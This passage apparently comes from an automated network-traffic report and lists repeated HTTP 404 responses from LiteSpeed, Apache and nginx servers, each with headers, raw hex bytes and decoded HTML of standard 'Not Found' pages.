ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f c6 61 ea de 07 6e e8 07 15 18 fe 4a 60 e4 70 8c 12 d8 e4 fd 2c cb b4 23 bf e8 cf 00 54 14 67 c5 c3 e0 9f bd 4b 7b 3f ed 75 0c 9b e2 18 8e bc 1f cb 4d c7 09 53 ff 61 70 d3 9f 98 85 1f a6 ef ba ff f3 3b fb a5 6b 57 61 96 7e 01 47 cf 2a b7 b8 91 87 13 96 79 6c 02 59 58 71 66 47 ff 07 db 7d ed f1 67 02 89 dc ee f4 cc e4 7d ec 7a 40 4a 66 5d 65 ef 37 7b 19 2e 9e a5 f8 e3 f8 db d9 07 28 72 ad 81 b7 93 7e 05 88 cc b3 b4 74 ef c3 d4 cb 6e 0e fa 2a 57 e6 d2 de f6 be 5a 5e 56 66 55 97 40 3b 8e 7b b3 f8 82 9a 67 f5 0f 11 e4 5f fe 68 75 e1 9a 65 96 7e be 1e 1b 5e af ef 21 f9 99 0a ae 38 bb c8 d4 ae 2e e7 fa f2 5d b3 e0 bc fd 5e f7 bd a3 b8 d9 f0 f5 b4 c8 a5 7d c8 6f 8f a5 1e 18 c0 f0 3e 10 d7 15 5a 0b 37 77 4d a0 33 e0 46 9e 7f be 91 eb d9 bf 9a f9 ba 2b 36 c1 29 82 7a 3f ed 75 6c 7a 69 6f 63 57 a7 bc e5 c8 fc e4 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f a6 14 a6 6f a6 3c c1 3f 01 da b5 3e 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f 87 ed e5 75 85 25 74 74 3d 78 25 89 77 f4 6f c5 d0 ab fb de 71 ed ac 30 7b fd 3d 0c 80 4b 71 8b de 09 bd df e8 55 e2 c0 1f d1 cc 95 36 3e dd e7 21 c8 1a b7 b8 c2 d7 7b 36 1e bc cc ae cb cf 87 4d e0 67 9a 5b cb 79 65 02 a3 46 c4 64 f4 c6 e0 15 13 9f a3 f8 d5 af 7d a4 a8 5f 10 63 1d df e8 e6 bb a5 85 e9 c5 67 7f e0 f3 e2 b0 ac ee 2f 61 a5 07 7c ea 0e b2 ba 2a 43 e0 10 fa 8f 37 f6 7b 45 be 72 77 e3 8c bf c3 eb aa ff ed b4 80 a7 38 bc 61 cb 8b b3 de be 7a cf f8 7e 87 8b a6 cd 38 f4 81 92 6d 70 43 70 8b b7 f1 37 92 5f 6f ec e6 05 f4 1f ed 74 09 b8 20 46 7d e6 c3 7a 47 70 1f 26 a6 7f ab c6 ef 87 fa d4 f7 5e 96 f6 b7 1c 10 a0 6e cf d7 c7 dc f6 25 3e 5a 59 ec bc 9d a2 97 e3 f5 29 7f 94 41 9b 15 ce bd 05 30 12 81 18 d5 ff b9 37 e3 f8 3d 81 5f 3a 15 08 ea 00 dc 03 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 01 Nov 2024 02:46:22 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f c6 61 ea de 07 6e e8 07 15 18 fe 4a 60 e4 70 8c 12 d8 e4 fd 2c cb b4 23 bf e8 cf 00 54 14 67 c5 c3 e0 9f bd 4b 7b 3f ed 75 0c 9b e2 18 8e bc 1f cb 4d c7 09 53 ff 61 70 d3 9f 98 85 1f a6 ef ba ff f3 3b fb a5 6b 57 61 96 7e 01 47 cf 2a b7 b8 91 87 13 96 79 6c 02 59 58 71 66 47 ff 07 db 7d ed f1 67 02 89 dc ee f4 cc e4 7d ec 7a 40 4a 66 5d 65 ef 37 7b 19 2e 9e a5 f8 e3 f8 db d9 07 28 72 ad 81 b7 93 7e 05 88 cc b3 b4 74 ef c3 d4 cb 6e 0e fa 2a 57 e6 d2 de f6 be 5a 5e 56 66 55 97 40 3b 8e 7b b3 f8 82 9a 67 f5 0f 11 e4 5f fe 68 75 e1 9a 65 96 7e be 1e 1b 5e af ef 21 f9 99 0a ae 38 bb c8 d4 ae 2e e7 fa f2 5d b3 e0 bc fd 5e f7 bd a3 b8 d9 f0 f5 b4 c8 a5 7d c8 6f 8f a5 1e 18 c0 f0 3e 10 d7 15 5a 0b 37 77 4d a0 33 e0 46 9e 7f be 91 eb d9 bf 9a f9 ba 2b 36 c1 29 82 7a 3f ed 75 6c 7a 69 6f 63 57 a7 bc e5 c8 fc e4 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f a6 14 a6 6f a6 3c c1 3f 01 da b5 3e 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f 87 ed e5 75 85 25 74 74 3d 78 25 89 77 f4 6f c5 d0 ab fb de 71 ed ac 30 7b fd 3d 0c 80 4b 71 8b de 09 bd df e8 55 e2 c0 1f d1 cc 95 36 3e dd e7 21 c8 1a b7 b8 c2 d7 7b 36 1e bc cc ae cb cf 87 4d e0 67 9a 5b cb 79 65 02 a3 46 c4 64 f4 c6 e0 15 13 9f a3 f8 d5 af 7d a4 a8 5f 10 63 1d df e8 e6 bb a5 85 e9 c5 67 7f e0 f3 e2 b0 ac ee 2f 61 a5 07 7c ea 0e b2 ba 2a 43 e0 10 fa 8f 37 f6 7b 45 be 72 77 e3 8c bf c3 eb aa ff ed b4 80 a7 38 bc 61 cb 8b b3 de be 7a cf f8 7e 87 8b a6 cd 38 f4 81 92 6d 70 43 70 8b b7 f1 37 92 5f 6f ec e6 05 f4 1f ed 74 09 b8 20 46 7d e6 c3 7a 47 70 1f 26 a6 7f ab c6 ef 87 fa d4 f7 5e 96 f6 b7 1c 10 a0 6e cf d7 c7 dc f6 25 3e 5a 59 ec bc 9d a2 97 e3 f5 29 7f 94 41 9b 15 ce bd 05 30 12 81 18 d5 ff b9 37 e3 f8 3d 81 5f 3a 15 08 ea 00 dc 03 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 01 Nov 2024 02:46:25 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 42 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f c6 61 ea de 07 6e e8 07 15 18 fe 4a 60 e4 70 8c 12 d8 e4 fd 2c cb b4 23 bf e8 cf 00 54 14 67 c5 c3 e0 9f bd 4b 7b 3f ed 75 0c 9b e2 18 8e bc 1f cb 4d c7 09 53 ff 61 70 d3 9f 98 85 1f a6 ef ba ff f3 3b fb a5 6b 57 61 96 7e 01 47 cf 2a b7 b8 91 87 13 96 79 6c 02 59 58 71 66 47 ff 07 db 7d ed f1 67 02 89 dc ee f4 cc e4 7d ec 7a 40 4a 66 5d 65 ef 37 7b 19 2e 9e a5 f8 e3 f8 db d9 07 28 72 ad 81 b7 93 7e 05 88 cc b3 b4 74 ef c3 d4 cb 6e 0e fa 2a 57 e6 d2 de f6 be 5a 5e 56 66 55 97 40 3b 8e 7b b3 f8 82 9a 67 f5 0f 11 e4 5f fe 68 75 e1 9a 65 96 7e be 1e 1b 5e af ef 21 f9 99 0a ae 38 bb c8 d4 ae 2e e7 fa f2 5d b3 e0 bc fd 5e f7 bd a3 b8 d9 f0 f5 b4 c8 a5 7d c8 6f 8f a5 1e 18 c0 f0 3e 10 d7 15 5a 0b 37 77 4d a0 33 e0 46 9e 7f be 91 eb d9 bf 9a f9 ba 2b 36 c1 29 82 7a 3f ed 75 6c 7a 69 6f 63 57 a7 bc e5 c8 fc e4 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f a6 14 a6 6f a6 3c c1 3f 01 da b5 3e 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f 87 ed e5 75 85 25 74 74 3d 78 25 89 77 f4 6f c5 d0 ab fb de 71 ed ac 30 7b fd 3d 0c 80 4b 71 8b de 09 bd df e8 55 e2 c0 1f d1 cc 95 36 3e dd e7 21 c8 1a b7 b8 c2 d7 7b 36 1e bc cc ae cb cf 87 4d e0 67 9a 5b cb 79 65 02 a3 46 c4 64 f4 c6 e0 15 13 9f a3 f8 d5 af 7d a4 a8 5f 10 63 1d df e8 e6 bb a5 85 e9 c5 67 7f e0 f3 e2 b0 ac ee 2f 61 a5 07 7c ea 0e b2 ba 2a 43 e0 10 fa 8f 37 f6 7b 45 be 72 77 e3 8c bf c3 eb aa ff ed b4 80 a7 38 bc 61 cb 8b b3 de be 7a cf f8 7e 87 8b a6 cd 38 f4 81 92 6d 70 43 70 8b b7 f1 37 92 5f 6f ec e6 05 f4 1f ed 74 09 b8 20 46 7d e6 c3 7a 47 70 1f 26 a6 7f ab c6 ef 87 fa d4 f7 5e 96 f6 b7 1c 10 a0 6e cf d7 c7 dc f6 25 3e 5a 59 ec bc 9d a2 97 e3 f5 29 7f 94 41 9b 15 ce bd 05 30 12 81 18 d5 ff b9 37 e3 f8 3d 81 5f 3a 15 08 ea 00 dc 03 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Fri, 01 Nov 2024 02:46:27 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 36 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 02:46:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 02:46:36 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 02:46:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 02:46:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 02:46:47 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 02:46:50 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 02:46:52 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
